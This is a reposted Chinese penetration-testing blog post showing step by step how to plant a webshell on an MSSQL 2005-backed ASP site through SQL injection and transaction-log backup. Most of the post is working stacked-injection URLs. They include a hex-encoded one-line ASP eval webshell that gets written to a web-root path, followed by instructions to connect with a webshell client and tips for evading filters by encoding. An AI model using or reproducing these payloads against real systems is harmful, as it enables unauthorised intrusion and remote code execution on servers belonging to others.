Web渗透之mssql2005 差异备份getshell

  • A+
所属分类:安全文章

Web渗透之mssql2005 差异备份getshell

这里记录下mssql2005差异备份拿shell的过程

 

http://192.168.5.21:81/index.asp?id=1;alter/**/database/**/[asp_test]/**/set/**/recovery/**/full--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[asp_test]/**/to/**/[email protected]/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;;drop/**/table/**/[itpro]--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;create/**/table/**/[itpro]([a]/**/image)--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[asp_test]/**/to/**/[email protected]/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x45003A005C0077007700770072006F006F0074005C006100730070005F00730071006C0069005C006800610063006B002E00610073007000/**/backup/**/log/**/[asp_test]/**/to/**/[email protected]/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;drop/**/table/**/[itpro]--

Web渗透之mssql2005 差异备份getshell

http://192.168.5.21:81/index.asp?id=1;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[asp_test]/**/to/**/[email protected]/**/with/**/init--

Web渗透之mssql2005 差异备份getshell

Web渗透之mssql2005 差异备份getshell

菜刀连接即可

Web渗透之mssql2005 差异备份getshell



其中红色的“asp_test”是数据库名,这个要根据自己的情况来修改,

然后的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,


另外“0x45003A005C0077007700770072006F006F0074005C006100730070005F00730071006C0069005C006800610063006B002E00610073007000”为备份的路径“E:wwwrootasp_sqlihack.asp”,都是使用的SQL_En的格式,


另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“[email protected]”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。


转载自:卿先生博客地址:https://www.cnblogs.com/-qing-/p/10692824.html

没有专业运营团队,纯个人凭着空闲时间的学习,通过网络搜集与学习整理的资料记录并分享。

 如果觉得文章对你有帮助,请支持下点击右下角“在看”

Web渗透之mssql2005 差异备份getshell


本文始发于微信公众号(LemonSec):Web渗透之mssql2005 差异备份getshell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: